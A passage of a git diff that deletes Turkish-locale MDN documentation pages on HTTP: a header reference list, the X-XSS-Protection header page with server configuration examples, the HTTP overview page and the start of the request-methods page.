httpheader("Transfer-Encoding") }} and {{ httpheader("Upgrade") }}. Note that only hop-by-hop headers may be set using the {{ httpheader("Connection") }} general header.</dd> -</dl> - -<p>The following list summarizes HTTP headers by their usage category. For an alphabetical list, see the navigation on the left side.</p> - -<h2 id="Authentication">Authentication</h2> - -<dl> - <dt>{{HTTPHeader("WWW-Authenticate")}}</dt> - <dd>Bir kaynağa erişmek için kullanılacak authentication yöntemini tanımlar.</dd> - <dt>{{HTTPHeader("Authorization")}}</dt> - <dd>Contains the credentials to authenticate a user agent with a server.</dd> - <dt>{{HTTPHeader("Proxy-Authenticate")}}</dt> - <dd>Defines the authentication method that should be used to gain access to a resource behind a Proxy server.</dd> - <dt>{{HTTPHeader("Proxy-Authorization")}}</dt> - <dd>Contains the credentials to authenticate a user agent with a proxy server.</dd> -</dl> - -<h2 id="Caching">Caching</h2> - -<dl> - <dt>{{HTTPHeader("Age")}}</dt> - <dd>The time in seconds the object has been in a proxy cache.</dd> - <dt>{{HTTPHeader("Cache-Control")}}</dt> - <dd>Specifies directives for caching mechanisms in both requests and responses.</dd> - <dt>{{HTTPHeader("Expires")}}</dt> - <dd>The date/time after which the response is considered stale.</dd> - <dt>{{HTTPHeader("Pragma")}}</dt> - <dd>Implementation-specific header that may have various effects anywhere along the request-response chain. Used for backwards compatibility with HTTP/1.0 caches where the <code>Cache-Control</code> header is not yet present.</dd> - <dt>{{HTTPHeader("Warning")}}</dt> - <dd>A general warning field containing information about possible problems.</dd> -</dl> - -<h2 id="Client_hints">Client hints</h2> - -<dl> - <dt>{{HTTPHeader("Accept-CH")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Content-DPR")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("DPR")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Downlink")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Save-Data")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Viewport-Width")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Width")}}</dt> - <dd>...</dd> -</dl> - -<dl> - <dt> - <h2 id="Conditionals">Conditionals</h2> - </dt> - <dt>{{HTTPHeader("Last-Modified")}}</dt> - <dd>It is a validator, the last modification date of the resource, used to compare several versions of the same resource. It is less accurate than {{HTTPHeader("ETag")}}, but easier to calculate in some environments. Conditional requests using {{HTTPHeader("If-Modified-Since")}} and {{HTTPHeader("If-Unmodified-Since")}} use this value to change the behavior of the request.</dd> - <dt>{{HTTPHeader("ETag")}}</dt> - <dd>It is a validator, a unique string identifying the version of the resource. Conditional requests using {{HTTPHeader("If-Match")}} and {{HTTPHeader("If-None-Match")}} use this value to change the behavior of the request.</dd> - <dt>{{HTTPHeader("If-Match")}}</dt> - <dd>Makes the request conditional and applies the method only if the stored resource matches one of the given ETags.</dd> - <dt>{{HTTPHeader("If-None-Match")}}</dt> - <dd>Makes the request conditional and applies the method only if the stored resource doesn't match any of the given ETags. This is used to update caches (for safe requests), or to prevent to upload a new resource when one is already existing.</dd> - <dt>{{HTTPHeader("If-Modified-Since")}}</dt> - <dd>Makes the request conditional and expects the entity to be transmitted only if it has been modified after the given date. This is used to transmit data only when the cache is out of date.</dd> - <dt>{{HTTPHeader("If-Unmodified-Since")}}</dt> - <dd>Makes the request conditional and expects the entity to be transmitted only if it has not been modified after the given date. This is used to ensure the coherence of a new fragment of a specific range with previous ones, or to implement an optimistic concurrency control system when modifying existing documents.</dd> -</dl> - -<h2 id="Connection_management">Connection management</h2> - -<dl> - <dt>{{HTTPHeader("Connection")}}</dt> - <dd>Controls whether the network connection stays open after the current transaction finishes.</dd> - <dt>{{HTTPHeader("Keep-Alive")}}</dt> - <dd>Controls how long a persistent connection should stay open.</dd> -</dl> - -<h2 id="Content_negotiation">Content negotiation</h2> - -<dl> - <dt>{{HTTPHeader("Accept")}}</dt> - <dd>Informs the server about the types of data that can be sent back. It is MIME-type.</dd> - <dt>{{HTTPHeader("Accept-Charset")}}</dt> - <dd>Informs the server about which character set the client is able to understand.</dd> - <dt>{{HTTPHeader("Accept-Encoding")}}</dt> - <dd>Informs the server about the encoding algorithm, usually a compression algorithm, that can be used on the resource sent back.</dd> - <dt>{{HTTPHeader("Accept-Language")}}</dt> - <dd>Informs the server about the language the server is expected to send back. This is a hint and is not necessarily under the full control of the user: the server should always pay attention not to override an explicit user choice (like selecting a language in a drop down list).</dd> -</dl> - -<dl> -</dl> - -<h2 id="Controls">Controls</h2> - -<dl> - <dt>{{HTTPHeader("Expect")}}</dt> - <dd>Indicates expectations that need to be fulfilled by the server in order to properly handle the request.</dd> - <dt>{{HTTPHeader("Max-Forwards")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Cookies">Cookies</h2> - -<dl> - <dt>{{HTTPHeader("Cookie")}}</dt> - <dd>Contains stored <a href="/en-US/docs/Web/HTTP/Cookies">HTTP cookies</a> previously sent by the server with the {{HTTPHeader("Set-Cookie")}} header.</dd> - <dt>{{HTTPHeader("Set-Cookie")}}</dt> - <dd>Send cookies from the server to the user agent.</dd> - <dt>{{HTTPHeader("Cookie2")}} {{obsolete_inline}}</dt> - <dd>Used to contain an HTTP cookie, previously sent by the server with the {{HTTPHeader("Set-Cookie2")}} header, but has been obsoleted by the specification. Use {{HTTPHeader("Cookie")}} instead.</dd> - <dt>{{HTTPHeader("Set-Cookie2")}} {{obsolete_inline}}</dt> - <dd>Used to send cookies from the server to the user agent, but has been obsoleted by the specification. Use {{HTTPHeader("Set-Cookie")}} instead.</dd> - <dt> - <h2 id="CORS">CORS</h2> - </dt> - <dt>{{HTTPHeader("Access-Control-Allow-Origin")}}</dt> - <dd>Indicates whether the response can be shared.</dd> - <dt>{{HTTPHeader("Access-Control-Allow-Credentials")}}</dt> - <dd>Indicates whether the response to the request can be exposed when the credentials flag is true.</dd> - <dt>{{HTTPHeader("Access-Control-Allow-Headers")}}</dt> - <dd>Used in response to a preflight request to indicate which HTTP headers can be used when making the actual request.</dd> - <dt>{{HTTPHeader("Access-Control-Allow-Methods")}}</dt> - <dd>Specifies the method or methods allowed when accessing the resource in response to a preflight request.</dd> - <dt>{{HTTPHeader("Access-Control-Expose-Headers")}}</dt> - <dd>Indicates which headers can be exposed as part of the response by listing their names.</dd> - <dt>{{HTTPHeader("Access-Control-Max-Age")}}</dt> - <dd>Indicates how long the results of a preflight request can be cached.</dd> - <dt>{{HTTPHeader("Access-Control-Request-Headers")}}</dt> - <dd>Used when issuing a preflight request to let the server know which HTTP headers will be used when the actual request is made.</dd> - <dt>{{HTTPHeader("Access-Control-Request-Method")}}</dt> - <dd>Used when issuing a preflight request to let the server know which <a href="/en-US/docs/Web/HTTP/Methods">HTTP method</a> will be used when the actual request is made.</dd> - <dt>{{HTTPHeader("Origin")}}</dt> - <dd>Indicates where a fetch originates from.</dd> - <dt>{{HTTPHeader("Timing-Allow-Origin")}}</dt> - <dd>Specifies origins that are allowed to see values of attributes retrieved via features of the <a href="/en-US/docs/Web/API/Resource_Timing_API">Resource Timing API</a>, which would otherwise be reported as zero due to cross-origin restrictions.</dd> -</dl> - -<h2 id="Do_Not_Track">Do Not Track</h2> - -<dl> - <dt>{{HTTPHeader("DNT")}}</dt> - <dd>Used for expressing the user's tracking preference.</dd> - <dt>{{HTTPHeader("Tk")}}</dt> - <dd>Indicates the tracking status that applied to the corresponding request.</dd> -</dl> - -<h2 id="Downloads">Downloads</h2> - -<dl> - <dt>{{HTTPHeader("Content-Disposition")}}</dt> - <dd>Is a response header if the resource transmitted should be displayed inline (default behavior when the header is not present), or it should be handled like a download and the browser should present a 'Save As' window.</dd> -</dl> - -<h2 id="Message_body_information">Message body information</h2> - -<dl> - <dt>{{HTTPHeader("Content-Length")}}</dt> - <dd>indicates the size of the entity-body, in decimal number of octets, sent to the recipient.</dd> - <dt>{{HTTPHeader("Content-Type")}}</dt> - <dd>Indicates the media type of the resource.</dd> - <dt>{{HTTPHeader("Content-Encoding")}}</dt> - <dd>Used to specify the compression algorithm.</dd> - <dt>{{HTTPHeader("Content-Language")}}</dt> - <dd>Describes the language(s) intended for the audience, so that it allows a user to differentiate according to the users' own preferred language.</dd> - <dt>{{HTTPHeader("Content-Location")}}</dt> - <dd>Indicates an alternate location for the returned data.</dd> - <dt> - <h2 id="Proxies">Proxies</h2> - </dt> -</dl> - -<dl> - <dt>{{HTTPHeader("Forwarded")}}</dt> - <dd>Contains information from the client-facing side of proxy servers that is altered or lost when a proxy is involved in the path of the request.</dd> - <dt>{{HTTPHeader("X-Forwarded-For")}} {{non-standard_inline}}</dt> - <dd>Identifies the originating IP addresses of a client connecting to a web server through an HTTP proxy or a load balancer.</dd> - <dt>{{HTTPHeader("X-Forwarded-Host")}} {{non-standard_inline}}</dt> - <dd>Identifies the original host requested that a client used to connect to your proxy or load balancer.</dd> - <dt>{{HTTPHeader("X-Forwarded-Proto")}} {{non-standard_inline}}</dt> - <dd>identifies the protocol (HTTP or HTTPS) that a client used to connect to your proxy or load balancer.</dd> - <dt>{{HTTPHeader("Via")}}</dt> - <dd>Added by proxies, both forward and reverse proxies, and can appear in the request headers and the response headers.</dd> -</dl> - -<h2 id="Redirects">Redirects</h2> - -<dl> - <dt>{{HTTPHeader("Location")}}</dt> - <dd>Indicates the URL to redirect a page to.</dd> -</dl> - -<h2 id="Request_context">Request context</h2> - -<dl> - <dt>{{HTTPHeader("From")}}</dt> - <dd>Contains an Internet email address for a human user who controls the requesting user agent.</dd> - <dt>{{HTTPHeader("Host")}}</dt> - <dd>Specifies the domain name of the server (for virtual hosting), and (optionally) the TCP port number on which the server is listening.</dd> - <dt>{{HTTPHeader("Referer")}}</dt> - <dd>The address of the previous web page from which a link to the currently requested page was followed.</dd> - <dt>{{HTTPHeader("Referrer-Policy")}}</dt> - <dd>Governs which referrer information sent in the {{HTTPHeader("Referer")}} header should be included with requests made.</dd> - <dt>{{HTTPHeader("User-Agent")}}</dt> - <dd>Contains a characteristic string that allows the network protocol peers to identify the application type, operating system, software vendor or software version of the requesting software user agent. See also the <a href="/en-US/docs/Web/HTTP/Headers/User-Agent/Firefox">Firefox user agent string reference</a>.</dd> -</dl> - -<h2 id="Response_context">Response context</h2> - -<dl> - <dt>{{HTTPHeader("Allow")}}</dt> - <dd>Lists the set of HTTP request methods support by a resource.</dd> - <dt>{{HTTPHeader("Server")}}</dt> - <dd>Contains information about the software used by the origin server to handle the request.</dd> -</dl> - -<h2 id="Range_requests">Range requests</h2> - -<dl> - <dt>{{HTTPHeader("Accept-Ranges")}}</dt> - <dd>Indicates if the server supports range requests and if so, in which unit the range can be expressed.</dd> - <dt>{{HTTPHeader("Range")}}</dt> - <dd>Indicates the part of a document that the server should return.</dd> - <dt>{{HTTPHeader("If-Range")}}</dt> - <dd>Creates a conditional range request that is only fulfilled if the given etag or date matches the remote resource. Used to prevent downloading two ranges from incompatible version of the resource.</dd> - <dt>{{HTTPHeader("Content-Range")}}</dt> - <dd>Indicates where in a full body message a partial message belongs.</dd> -</dl> - -<h2 id="Security">Security</h2> - -<dl> - <dt>{{HTTPHeader("Content-Security-Policy")}} ({{Glossary("CSP")}})</dt> - <dd>Controls resources the user agent is allowed to load for a given page.</dd> - <dt>{{HTTPHeader("Content-Security-Policy-Report-Only")}}</dt> - <dd>Allows web developers to experiment with policies by monitoring (but not enforcing) their effects. These violation reports consist of {{Glossary("JSON")}} documents sent via an HTTP <code>POST</code> request to the specified URI.</dd> - <dt>{{HTTPHeader("Public-Key-Pins")}} ({{Glossary("HPKP")}})</dt> - <dd>Associates a specific cryptographic public key with a certain web server to decrease the risk of {{Glossary("MITM")}} attacks with forged certificates.</dd> - <dt>{{HTTPHeader("Public-Key-Pins-Report-Only")}}</dt> - <dd>Sends reports to the report-uri specified in the header and does still allow clients to connect to the server even if the pinning is violated.</dd> -</dl> - -<dl> - <dt>{{HTTPHeader("Strict-Transport-Security")}} ({{Glossary("HSTS")}})</dt> - <dd>Force communication using HTTPS instead of HTTP.</dd> - <dt>{{HTTPHeader("Upgrade-Insecure-Requests")}}</dt> - <dd>Sends a signal to the server expressing the client’s preference for an encrypted and authenticated response, and that it can successfully handle the {{CSP("upgrade-insecure-requests")}} directive.</dd> -</dl> - -<dl> - <dt>{{HTTPHeader("X-Content-Type-Options")}}</dt> - <dd>Disables MIME sniffing and forces browser to use the type given in {{HTTPHeader("Content-Type")}}.</dd> -</dl> - -<dl> - <dt>{{HTTPHeader("X-Frame-Options")}} (XFO)</dt> - <dd>Indicates whether a browser should be allowed to render a page in a {{HTMLElement("frame")}}, {{HTMLElement("iframe")}} or {{HTMLElement("object")}}</dd> - <dt>{{HTTPHeader("X-XSS-Protection")}}</dt> - <dd>Enables cross-site scripting filtering.</dd> -</dl> - -<h2 id="Server-sent_events">Server-sent events</h2> - -<dl> - <dt>{{HTTPHeader("Ping-From")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Ping-To")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Last-Event-ID")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Transfer_coding">Transfer coding</h2> - -<dl> - <dt>{{HTTPHeader("Transfer-Encoding")}}</dt> - <dd>Specifies the the form of encoding used to safely transfer the entity to the user.</dd> - <dt>{{HTTPHeader("TE")}}</dt> - <dd>Specifies the transfer encodings the user agent is willing to accept.</dd> - <dt>{{HTTPHeader("Trailer")}}</dt> - <dd>Allows the sender to include additional fields at the end of chunked message.</dd> -</dl> - -<h2 id="WebSockets">WebSockets</h2> - -<dl> - <dt>{{HTTPHeader("Sec-WebSocket-Key")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Extensions")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Accept")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Protocol")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Sec-WebSocket-Version")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Other">Other</h2> - -<dl> - <dt>{{HTTPHeader("Date")}}</dt> - <dd>Contains the date and time at which the message was originated.</dd> - <dt>{{HTTPHeader("Large-Allocation")}}</dt> - <dd>Tells the browser that the page being loaded is going to want to perform a large allocation.</dd> - <dt>{{HTTPHeader("Link")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("Retry-After")}}</dt> - <dd>Indicates how long the user agent should wait before making a follow-up request.</dd> - <dt>{{HTTPHeader("SourceMap")}}</dt> - <dd>Links generated code to a <a href="/en-US/docs/Tools/Debugger/How_to/Use_a_source_map">source map</a>.</dd> - <dt>{{HTTPHeader("Upgrade")}}</dt> - <dd>The relevant RFC document for the <a href="https://tools.ietf.org/html/rfc7230#section-6.7">Upgrade header field is RFC 7230, section 6.7</a>. The standard establishes rules for upgrading or changing to a different protocol on the current client, server, transport protocol connection. For example, this header standard allows a client to change from HTTP 1.1 to HTTP 2.0, assuming the server decides to acknowledge and implement the Upgrade header field. Niether party is required to accept the terms specified in the Upgrade header field. It can be used in both client and server headers. If the Upgrade header field is specified, then the sender MUST also send the Connection header field with the upgrade option specified. For details on the Connection header field <a href="https://tools.ietf.org/html/rfc7230#section-6.1">please see section 6.1 of the aforementioned RFC</a>.</dd> - <dt>{{HTTPHeader("Vary")}}</dt> - <dd>Determines how to match future request headers to decide whether a cached response can be used rather than requesting a fresh one from the origin server.</dd> - <dt>{{HTTPHeader("X-DNS-Prefetch-Control")}}</dt> - <dd>Controls DNS prefetching, a feature by which browsers proactively perform domain name resolution on both links that the user may choose to follow as well as URLs for items referenced by the document, including images, CSS, JavaScript, and so forth.</dd> - <dt>{{HTTPHeader("X-Firefox-Spdy")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("X-Requested-With")}}</dt> - <dd>...</dd> - <dt>{{HTTPHeader("X-UA-Compatible")}}</dt> - <dd>...</dd> -</dl> - -<h2 id="Contributing">Contributing</h2> - -<p>You can help by <a href="/en-US/docs/MDN/Contribute/Howto/Document_an_HTTP_header">writing new entries</a> or improving the existing ones.</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="https://en.wikipedia.org/wiki/List_of_HTTP_header_fields">Wikipedia page on List of HTTP headers</a></li> - <li><a href="https://www.iana.org/assignments/message-headers/perm-headers.html">IANA registry</a></li> -</ul> diff --git a/files/tr/web/http/headers/x-xss-protection/index.html b/files/tr/web/http/headers/x-xss-protection/index.html deleted file mode 100644 index fede0fd5d4..0000000000 --- a/files/tr/web/http/headers/x-xss-protection/index.html +++ /dev/null @@ -1,77 +0,0 @@ ---- -title: X-XSS-Protection -slug: Web/HTTP/Headers/X-XSS-Protection -translation_of: Web/HTTP/Headers/X-XSS-Protection ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP X-XSS-Protection yanıt üstbilgisi, Internet Explorer'ın, Chrome'un ve Safari'nin, yansıyan bölgeler arası komut dosyalarını algıladıklarında sayfaların yüklenmesini durduran bir özelliğidir ({{Glossary("XSS")}}) Bu güvenlik önlemleri, modern tarayıcılarda siteler güçlü bir şekilde uygulandığında büyük oranda gerekli olmasa da{{HTTPHeader("Content-Security-Policy")}} satır içi JavaScript kullanımını devre dışı bırakan (<code>'unsafe-inline'</code>), henüz desteklemeyen eski web tarayıcılarının kullanıcıları için koruma sağlayabilirler {{Glossary("CSP")}}.</p> - -<table class="properties"> - <tbody> - <tr> - <th scope="row">Başlık Tipi</th> - <td>{{Glossary("Response header")}}</td> - </tr> - <tr> - <th scope="row">{{Glossary("Yasak başlık adı")}}</th> - <td>no</td> - </tr> - </tbody> -</table> - -<h2 id="Sözdizimi">Sözdizimi</h2> - -<pre class="syntaxbox">X-XSS-Protection: 0 -X-XSS-Protection: 1 -X-XSS-Protection: 1; mode=block -X-XSS-Protection: 1; report=<reporting-uri> -</pre> - -<dl> - <dt>0</dt> - <dd>XSS filtrelemeyi devre dışı bırakır.</dd> - <dt>1</dt> - <dd>XSS filtrelemeyi etkinleştirir (genellikle tarayıcılarda varsayılan). Siteler arası komut dosyası çalıştırma saldırısı tespit edilirse, tarayıcı sayfayı sanitize eder (güvensiz kısımları kaldırır).</dd> - <dt>1; mode=block</dt> - <dd>XSS filtrelemesini etkinleştirir. Sayfa sızdırmaz hale getirmek yerine tarayıcı, bir saldırı tespit edilirse sayfanın görüntülenmesini engeller.</dd> - <dt>1; report=<reporting-URI> (Sadece Chromium)</dt> - <dd>XSS filtrelemesini etkinleştirir. Siteler arası komut dosyası çalıştırma saldırısı tespit edilirse, tarayıcı sayfayı sanitize eder ve ihlali bildirir. Bu, CSP'nin işlevselliğini kullanır{{CSP("report-uri")}} bir rapor göndermek yönergesi.</dd> -</dl> - -<h2 id="Örneğin">Örneğin</h2> - -<p>Yansıyan XSS saldırılarını tespit ettiklerinde sayfaları yüklemeyi engelleyin:</p> - -<pre class="brush: bash">X-XSS-Protection: 1; mode=block</pre> - -<p>PHP</p> - -<pre class="brush: php">header("X-XSS-Protection: 1; mode=block");</pre> - -<p>Apache (.htaccess)</p> - -<pre class="brush: bash"><IfModule mod_headers.c> - Header set X-XSS-Protection "1; mode=block" -</IfModule></pre> - -<h2 id="Özellikler">Özellikler</h2> - -<p>Spesifikasyonların veya taslakların bir parçası değildir.</p> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden">Bu sayfadaki uyumluluk tablosu yapılandırılmış verilerden oluşturulmuştur. Verilere katkıda bulunmak istiyorsanız, lütfen https://github.com/mdn/browser-compat-data adresini ziyaret edin ve bize bir çekme isteği gönderin.</p> - -<p>{{Compat("http.headers.X-XSS-Protection")}}</p> - -<h2 id="Bunlara_da_bakın">Bunlara da bakın</h2> - -<ul> - <li>{{HTTPHeader("Content-Security-Policy")}}</li> - <li><a href="https://blogs.msdn.microsoft.com/ieinternals/2011/01/31/controlling-the-xss-filter/">Controlling the XSS Filter – Microsoft</a></li> - <li><a href="https://www.virtuesecurity.com/blog/understanding-xss-auditor/">Understanding XSS Auditor – Virtue Security</a></li> - <li> - <p><a href="http://blog.innerht.ml/the-misunderstood-x-xss-protection/">The misunderstood X-XSS-Protection – blog.innerht.ml</a></p> - </li> -</ul> diff --git a/files/tr/web/http/index.html b/files/tr/web/http/index.html deleted file mode 100644 index 0c331a9f9d..0000000000 --- a/files/tr/web/http/index.html +++ /dev/null @@ -1,85 +0,0 @@ ---- -title: HTTP -slug: Web/HTTP -tags: - - HTTP - - HTTP nedir - - Hypertext - - TCP/IP - - Web - - Web Geliştirme -translation_of: Web/HTTP ---- -<div>{{HTTPSidebar}}</div> - -<p class="summary"><span class="seoSummary"><strong><dfn>Hypertext Transfer Protocol (HTTP) hipermedya belgelerinin "HTML gibi" iletilmesi için oluşturulmuş bir <a class="external" href="https://tr.wikipedia.org/wiki/Uygulama_tabakas%C4%B1">uygulama katmanı</a> protokolüdür. HTTP web tarayıcıları ve web sunucuları arasında iletişim için dizayn edilmiştir, fakat diğer amaçlar için kullanılabilir. HTTP klasik <a class="external" href="https://tr.wikipedia.org/wiki/%C4%B0stemci-sunucu">istemci-sunucu modeline</a> uyar, bir istemci bir istek yapmak için bağlantı kurar ve ardından bir yanıt alana kadar bekler. HTTP <a class="external" href="https://en.wikipedia.org/wiki/Stateless_protocol">durumsuz protokoldür</a>, yani sunucu iki istek arasında herhangi bir veri (durum) tutmaz. Genellikle TCP/IP katmanına dayalı olsa da, herhangi bir güvenilir <a class="external" href="http://en.wikipedia.org/wiki/Transport_Layer">taşıma katmanının</a>, mesajları sessizce kaybetmeyen bir protokol "UDP gibi", üzerinde kullanılabilir. </dfn></strong></span><strong><a href="https://en.wikipedia.org/wiki/Reliable_User_Datagram_Protocol">RUDP</a> - UDP'nin güvenilir bir şekilde güncellenmesi - uygun bir alternatiftir.</strong></p> - -<div class="column-container"> -<div class="column-half"> -<h2 id="Dersler">Dersler</h2> - -<p>HTTP'yi rehberler ve dersler ile öğrenin.</p> - -<dl> - <dt><a href="/tr/docs/Web/HTTP/Overview">HTTP'ye Genel Bakış</a></dt> - <dd>İstemci-Sunucu protokolünün temel özellikleri, ne yapabileceği ve kullanım amaçları.</dd> - <dt><a href="/tr/docs/Web/HTTP/Caching">HTTP Önbellek</a></dt> - <dd>Önbellekleme hızlı Web siteleri için çok önemlidir. Bu yazı, farklı önbellekleme metodlarını ve HTTP başlıklarının önbellekleme kontrolü için nasıl kullanılacağını açıklamaktadır.</dd> - <dt><a href="/tr/docs/Web/HTTP/Cookies">HTTP Çerezleri</a></dt> - <dd>Çerezlerin nasıl çalıştığı <a class="external" href="http://tools.ietf.org/html/rfc6265">RFC 6265</a> ile belirlenmiştir. Sunucu bir HTTP isteğini karşılarken, cevap içerisindeki HTTP Header'ında bir <code>Set-Cookie</code> gönderebilir. İstemci bu cookie değerini her istekte <code>Cookie</code> Header'ı içerisinde aynı sunucuya geri gönderir. Cookie değeri belirli bir tarihte sona erecek şekilde ayarlanabilir ya da özel bir etki alanı veya yolu ile sınırlanabilir.</dd> - <dt><a href="/en-US/docs/Web/HTTP/Access_control_CORS">HTTP Erişim Kontrolü (CORS)</a></dt> - <dd><strong>Siteler arası HTTP istekleri</strong>, isteği yapan kaynağın etki alanından <strong>farklı bir etki alanı</strong>na yapılan isteklerdir. Örneğin; Domain A (<code>http://domaina.example/</code>) 'da bulunan bir HTML sayfası, <code>img</code> öğesi aracılığıyla Domain B (<code>http://domainb.foo/image.jpg</code>)'ye bir resim için istek atar. Günümüzde web sayfaları kaynaklarını (CSS stil sayfaları, resimler, betikler ve diğerleri) çoğunlukla cross-site olarak yükler. CORS; web geliştiricilerin sitelerinin, siteler arası isteklere nasıl tepki vereceğini kontrol etmelerini sağlar.</dd> -</dl> - -<dl> - <dt><a href="/en-US/docs/Web/HTTP/Basics_of_HTTP/Evolution_of_HTTP">HTTP'nin Evrimi</a></dt> - <dd>HTTP'nin ilk sürümleri ile modern HTTP / 2 ve sonrası arasındaki değişikliklerin kısa bir açıklaması.</dd> - <dt><a href="https://wiki.mozilla.org/Security/Guidelines/Web_Security">Mozilla web güvenliği kılavuzları</a></dt> - <dd>Operasyonel ekiplere güvenli web uygulamaları oluşturma konusunda yardımcı olacak ipuçları koleksiyonu.</dd> -</dl> - -<dl> - <dt><a href="/tr/docs/Web/HTTP/Mesajlar">HTTP Mesajları</a></dt> - <dd>HTTP / 1.x ve HTTP / 2 türündeki mesajların türünü ve yapısını açıklar.</dd> - <dt><a href="/tr/docs/Web/HTTP/Oturum">Tipik bir HTTP oturumu</a></dt> - <dd>Normal bir HTTP oturumunun akışını gösterir ve açıklar.</dd> - <dt><a href="/en-US/docs/Web/HTTP/Connection_management_in_HTTP_1.x">HTTP/1.x'de bağlantı yönetimi</a></dt> - <dd>HTTP/1.x'de ki 3 bağlantı yönetim modelini ve bunların güçlü ve zayıf yanlarını açıklar.</dd> -</dl> -</div> - -<div class="column-half"> -<h2 id="Referans">Referans</h2> - -<p>Ayrıntılı HTTP referanslarına göz atın.</p> - -<dl> - <dt><a href="/tr/docs/Web/HTTP/Headers">HTTP Başlıkları</a></dt> - <dd>HTTP mesaj başlıkları, bir kaynağı ya da sunucu veya istemcinin davranışını tanımlamak için kullanılır. Özel başlıklar X- öneki ile birlikte eklenebilir, diğerleri ise orijinal içeriği <a class="external" href="http://tools.ietf.org/html/rfc4229">RFC 4229</a>'da tanımlı olan <a class="external" href="https://www.iana.org/assignments/message-headers/message-headers.xhtml">IANA kayıtlarında</a> gösterilmiştir. IANA, aynı zamanda <a class="external" href="https://www.iana.org/assignments/message-headers/message-headers.xhtml">yeni önerilen HTTP mesaj başlıklarının</a> kaydını bulundurur.</dd> - <dt><a href="/tr/docs/Web/HTTP/Metotlar">HTTP İstek Metodları</a></dt> - <dd>HTTP ile yapılabilen farklı işlemler:<br> - {{HTTPMethod("GET")}}, {{HTTPMethod("POST")}}, ve daha az yaygın olan istek metodları, {{HTTPMethod("OPTIONS")}}, {{HTTPMethod("DELETE")}}, veya {{HTTPMethod("TRACE")}}.</dd> - <dt><a href="/tr/docs/Web/HTTP/Status">HTTP Durum Cevap Kodları</a></dt> - <dd>HTTP cevap kodları, belirli bir HTTP isteğinin başarıyla tamamlanıp tamamlanmadığını gösterir. Yanıtlar beş sınıfta gruplandırılmıştır: bilgilendirme yanıtları, başarılı yanıtlar, yönlendirmeler, istemci hataları ve sunucu hataları.</dd> - <dt><a href="/en-US/docs/Web/HTTP/Headers/Content-Security-Policy">CSP talimatları</a></dt> - <dd>{{HTTPHeader ("Content-Security-Policy")}} cevap başlığı alanları; web sitesi yöneticilerinin, user agent(örn. browser)'ın belirli bir sayfa için yüklemesine izin verilen kaynakları kontrol etmesini sağlar. Birkaç istisna dışında, politikalar çoğunlukla sunucu kaynaklarının ve komut dosyası kaynaklarının belirlenmesini içerir.</dd> -</dl> - -<h2 id="Araçlar_kaynaklar">Araçlar & kaynaklar</h2> - -<p>HTTP'yi anlamak ve hata ayıklamak için yardımcı araçlar ve kaynaklar.</p> - -<dl> - <dt><a href="/en-US/docs/Tools">Firefox Developer Tools</a></dt> - <dd><a href="/en-US/docs/Tools/Network_Monitor">Ağ izleyicisi</a></dd> - <dt><a href="https://observatory.mozilla.org/">Mozilla Gözlemevi</a></dt> - <dd> - <p>Proje; geliştiriciler, sistem yöneticileri ve güvenlik uzmanlarının sitelerini korunaklı ve güvenli bir şekilde yapılandırmalarına yardıcı olması için tasarlandı.</p> - </dd> - <dt><a class="external" href="https://redbot.org/">RedBot</a></dt> - <dd>Önbellek ile ilgili HTTP başlıklarını kontrol etmek için araçlar.</dd> - <dt><a href="http://www.html5rocks.com/en/tutorials/internals/howbrowserswork/">Tarayıcılar Nasıl Çalışır</a></dt> - <dd>Tarayıcı içindekiler ve HTTP protokolü üzerinden istek akışı hakkında çok kapsamlı bir makale. Her web gelişticisi KESİNLİKLE-OKUMALI.</dd> -</dl> -</div> -</div> diff --git a/files/tr/web/http/methods/index.html b/files/tr/web/http/methods/index.html deleted file mode 100644 index b31d22a365..0000000000 --- a/files/tr/web/http/methods/index.html +++ /dev/null @@ -1,73 +0,0 @@ ---- -title: HTTP istek metotları -slug: Web/HTTP/Methods -tags: - - HTTP - - Metotlar -translation_of: Web/HTTP/Methods -original_slug: Web/HTTP/metotlar ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="tlid-translation translation" lang="tr">HTTP, belirli bir kaynak üzerinde yapılması istenen eylemi belirten bir dizi <strong>istek metodu</strong> tanımlamaktadır. Bu istek metotları aslında isim olabildiği halde, bazen <em>HTTP fiilleri</em> olarak da adlandırılır. Bunların her biri farklı bir anlam ifade etse de, bazılarının ortak özellikleri bulunur: örneğin bir istek metodu {{glossary ("safe")}}, {{glossary ("idempotent")}} veya {{glossary ("cacheable")}} olabilir.</span></p> - -<dl> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/GET">GET</a></code></dt> - <dd><code>GET</code> metodu <span class="tlid-translation translation" lang="tr"> belirtilen kaynağın bir temsilini ister. </span> <code>GET</code> <span class="tlid-translation translation" lang="tr">kullanan istekler yalnızca veri almalıdır.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/HEAD">HEAD</a></code></dt> - <dd><code>HEAD</code> <span class="tlid-translation translation" lang="tr">metodu </span><code>GET</code> <span class="tlid-translation translation" lang="tr">isteği ile tamamen aynı olan sadece gövdesi olmayan bir yanıt ister.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/POST">POST</a></code></dt> - <dd><code>POST</code> <span class="tlid-translation translation" lang="tr">metodu belirtilen kaynağa bir varlık (entity) göndermek için kullanılır, bu da genellikle sunucuda bir durum değişikliği ya da yan etkilere neden olur.</span></dd> - <dt><code><a 